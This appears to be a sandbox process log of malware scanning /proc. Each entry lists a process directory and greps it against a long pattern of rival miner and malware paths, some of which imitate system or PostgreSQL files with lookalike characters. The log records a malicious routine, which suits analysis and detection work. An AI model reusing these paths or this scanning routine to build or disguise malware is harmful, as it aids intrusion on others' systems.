/bin/lsls -latrh /proc/202⤵PID:845
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:848
-
-
/bin/grepgrep exe2⤵PID:851
-
-
/bin/lsls -latrh /proc/212⤵PID:850
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:853
-
-
/bin/grepgrep exe2⤵PID:856
-
-
/bin/lsls -latrh /proc/222⤵PID:855
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:858
-
-
/bin/grepgrep exe2⤵PID:861
-
-
/bin/lsls -latrh /proc/232⤵PID:860
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:863
-
-
/bin/grepgrep exe2⤵PID:866
-
-
/bin/lsls -latrh /proc/2372⤵PID:865
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:868
-
-
/bin/grepgrep exe2⤵PID:871
-
-
/bin/lsls -latrh /proc/242⤵PID:870
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:873
-
-
/bin/grepgrep exe2⤵PID:876
-
-
/bin/lsls -latrh /proc/2542⤵PID:875
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:878
-
-
/bin/grepgrep exe2⤵PID:881
-
-
/bin/lsls -latrh /proc/32⤵PID:880
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:883
-
-
/bin/lsls -latrh /proc/3402⤵PID:885
-
-
/bin/grepgrep exe2⤵PID:886
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:888
-
-
/bin/grepgrep exe2⤵PID:891
-
-
/bin/lsls -latrh /proc/3432⤵PID:890
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:893
-
-
/bin/grepgrep exe2⤵PID:896
-
-
/bin/lsls -latrh /proc/3442⤵PID:895
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:898
-
-
/bin/grepgrep exe2⤵PID:901
-
-
/bin/lsls -latrh /proc/3452⤵PID:900
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:903
-
-
/bin/grepgrep exe2⤵PID:906
-
-
/bin/lsls -latrh /proc/362⤵PID:905
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:908
-
-
/bin/grepgrep exe2⤵PID:911
-
-
/bin/lsls -latrh /proc/372⤵PID:910
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:913
-
-
/bin/lsls -latrh /proc/3782⤵PID:915
-
-
/bin/grepgrep exe2⤵PID:916
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:918
-
-
/bin/grepgrep exe2⤵PID:921
-
-
/bin/lsls -latrh /proc/3912⤵PID:920
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:923
-
-
/bin/grepgrep exe2⤵PID:926
-
-
/bin/lsls -latrh /proc/3922⤵PID:925
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:928
-
-
/bin/grepgrep exe2⤵PID:931
-
-
/bin/lsls -latrh /proc/3962⤵PID:930
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:933
-
-
/bin/grepgrep exe2⤵PID:936
-
-
/bin/lsls -latrh /proc/42⤵PID:935
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:938
-
-
/bin/grepgrep exe2⤵PID:941
-
-
/bin/lsls -latrh /proc/4322⤵PID:940
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:943
-
-
/bin/grepgrep exe2⤵PID:947
-
-
/bin/lsls -latrh /proc/52⤵PID:946
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:950
-
-
/bin/grepgrep exe2⤵PID:953
-
-
/bin/lsls -latrh /proc/62⤵PID:952
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:956
-
-
/bin/grepgrep exe2⤵PID:960
-
-
/bin/lsls -latrh /proc/6832⤵PID:959
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:962
-
-
/bin/grepgrep exe2⤵PID:966
-
-
/bin/lsls -latrh /proc/6882⤵PID:965
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:969
-
-
/bin/grepgrep exe2⤵PID:973
-
-
/bin/lsls -latrh /proc/692⤵PID:972
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:976
-
-
/bin/grepgrep exe2⤵PID:979
-
-
/bin/lsls -latrh /proc/6902⤵PID:978
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:982
-
-
/bin/grepgrep exe2⤵PID:986
-
-
/bin/lsls -latrh /proc/6912⤵PID:985
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:988
-
-
/bin/grepgrep exe2⤵PID:993
-
-
/bin/lsls -latrh /proc/6922⤵PID:992
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:995
-
-
/bin/grepgrep exe2⤵PID:999
-
-
/bin/lsls -latrh /proc/72⤵PID:998
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1002
-
-
/bin/grepgrep exe2⤵PID:1006
-
-
/bin/lsls -latrh /proc/702⤵PID:1005
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1009
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/lsls -latrh /proc/712⤵PID:1012
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1016
-
-
/bin/grepgrep exe2⤵PID:1020
-
-
/bin/lsls -latrh /proc/7112⤵PID:1019
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1023
-
-
/bin/grepgrep exe2⤵PID:1027
-
-
/bin/lsls -latrh /proc/7122⤵PID:1025
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1030
-
-
/bin/grepgrep exe2⤵PID:1033
-
-
/bin/lsls -latrh /proc/7162⤵PID:1032
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1036
-
-
/bin/grepgrep exe2⤵PID:1040
-
-
/bin/lsls -latrh /proc/7172⤵PID:1039
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1043
-
-
/bin/grepgrep exe2⤵PID:1047
-
-
/bin/lsls -latrh /proc/7182⤵PID:1046
-
-
